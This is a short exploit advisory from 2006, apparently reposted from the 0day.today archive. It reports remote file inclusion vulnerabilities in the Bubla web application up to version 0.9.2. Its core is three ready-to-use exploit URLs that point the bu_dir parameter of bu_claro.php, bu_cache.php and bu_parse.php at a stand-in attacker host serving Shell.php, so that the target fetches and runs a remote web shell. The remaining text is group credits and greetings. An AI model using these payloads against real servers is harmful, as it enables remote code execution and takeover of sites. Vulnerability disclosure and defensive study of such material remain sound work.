Bubla <= 0.9.2 (bu_dir) Multiple Remote File Include Vulnerabilities

2006-12-31T00:00:00
ID 1337DAY-ID-1351
Type zdt
Reporter DeltahackingTEAM
Modified 2006-12-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Bubla <= 0.9.2 (bu_dir) Multiple Remote File Include Vulnerabilities
====================================================================



**********************************************************************************************************
                                              DeltasecurityTEAM
**********************************************************************************************************

* Portal Name = Bubla 0.9.1

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* 128 Bit Security Server= www.takserver.ir

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------

- Exploit:


http://localhost/[PATH]/bu/bu_claro.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_cache.php?bu_dir=http://evilsite/Shell.php?
http://localhost/[PATH]/bu/bu_parse.php?bu_dir=http://evilsite/Shell.php?
--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************



#  0day.today [2018-01-04]  #